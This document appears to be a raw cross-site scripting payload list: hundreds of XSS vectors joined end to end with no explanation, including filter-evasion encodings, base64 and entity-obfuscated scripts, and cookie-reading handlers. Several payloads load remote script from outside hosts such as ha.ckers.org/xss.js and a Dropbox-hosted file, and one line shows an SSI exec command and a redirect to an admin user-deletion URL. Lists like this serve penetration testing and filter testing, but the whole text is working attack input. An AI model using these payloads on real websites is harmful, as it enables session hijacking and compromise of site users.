href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe/%00/ src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> + <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> +‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=”jav ascript:alert(‘XSS’);”> +<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”> +<<SCRIPT>alert(“XSS”);//<</SCRIPT> +%253cscript%253ealert(1)%253c/script%253e +“><s”%2b”cript>alert(document.cookie)</script> +foo<script>alert(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<BODY BACKGROUND=”javascript:alert(‘XSS’)”> +<BODY ONLOAD=alert(‘XSS’)> +<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> +<IMG SRC=”javascript:alert(‘XSS’)” +<iframe src=http://ha.ckers.org/scriptlet.html < +javascript:alert("hellox worldss") +<img src="javascript:alert('XSS');"> +<img src=javascript:alert(&quot;XSS&quot;)> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search +<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 +<script>alert("XSS");</script>&search=1 +0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search +<h1><font color=blue>hellox worldss</h1> +<BODY ONLOAD=alert('hellox worldss')> +<input onfocus=write(XSS) autofocus> +<input onblur=write(XSS) autofocus><input autofocus> +<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form><button formaction="javascript:alert(XSS)">lol +<!--<img src="--><img src=x onerror=alert(XSS)//"> +<![><img src="]><img src=x onerror=alert(XSS)//"> +<style><img src="</style><img src=x onerror=alert(XSS)//"> +<? foo="><script>alert(1)</script>"> +<! foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<? foo="><x foo='?><script>alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>"> +<% foo><x foo="%><script>alert(123)</script>"> +<div style="font-family:'foo&#10;;color:red;';">LOL +LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> +<script>({0:#0=alert/#0#/#0#(0)})</script> +<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg> +&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt; +\\";alert('XSS');// +&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt; +&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;BODY ONLOAD=alert('XSS')&gt; +&lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BR SIZE=\"&{alert('XSS')}\"&gt; +&lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt; +&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt; +&lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt; +&lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt; +&lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt; +&lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS +&lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt; +&lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt; +&lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt; +žscriptualert(EXSSE)ž/scriptu +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\" +&lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt; +&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt; +&lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt; +&lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt; +&lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt; +&lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt; +exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\"); +xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt; +&lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt; +&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; +&lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt; +&lt;!--&#91;if gte IE 4&#93;&gt; +&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt; +&lt;!&#91;endif&#93;--&gt; +&lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt; +&lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt; +&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt; +&lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +&lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +a=\"get\"; +b=\"URL(\\"\"; +c=\"javascript&#058;\"; +d=\"alert('XSS');\\")\"; +eval(a+b+c+d); +&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt; +&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt; +&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt; +&lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;HTML&gt;&lt;BODY&gt; +&lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt; +&lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt; +&lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt; +&lt;/BODY&gt;&lt;/HTML&gt; +&lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt; +&lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt; +&lt;? echo('&lt;SCR)'; +echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt; +&lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt; +Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser +&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt; +&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +&lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt; +&lt; +%3C +&lt +&lt; +&LT +&LT; +&#60 +&#060 +&#0060 +&#00060 +&#000060 +&#0000060 +&lt; +&#x3c +&#x03c +&#x003c +&#x0003c +&#x00003c +&#x000003c +&#x3c; +&#x03c; +&#x003c; +&#x0003c; +&#x00003c; +&#x000003c; +&#X3c +&#X03c +&#X003c +&#X0003c +&#X00003c +&#X000003c +&#X3c; +&#X03c; +&#X003c; +&#X0003c; +&#X00003c; +&#X000003c; +&#x3C +&#x03C +&#x003C +&#x0003C +&#x00003C +&#x000003C +&#x3C; +&#x03C; +&#x003C; +&#x0003C; +&#x00003C; +&#x000003C; +&#X3C +&#X03C +&#X003C +&#X0003C +&#X00003C +&#X000003C +&#X3C; +&#X03C; +&#X003C; +&#X0003C; +&#X00003C; +&#X000003C; +\x3c +\x3C +\u003c +\u003C +&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS')\" +&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt; +&lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt; +&lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt; +&lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt; +perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out +perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out +&lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt; +&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt; +&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt; +&lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt; +&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt; +&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt; +'';!--\"&lt;XSS&gt;=&{()} +';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt; +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascrscriptipt:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> +\";alert('XSS');// 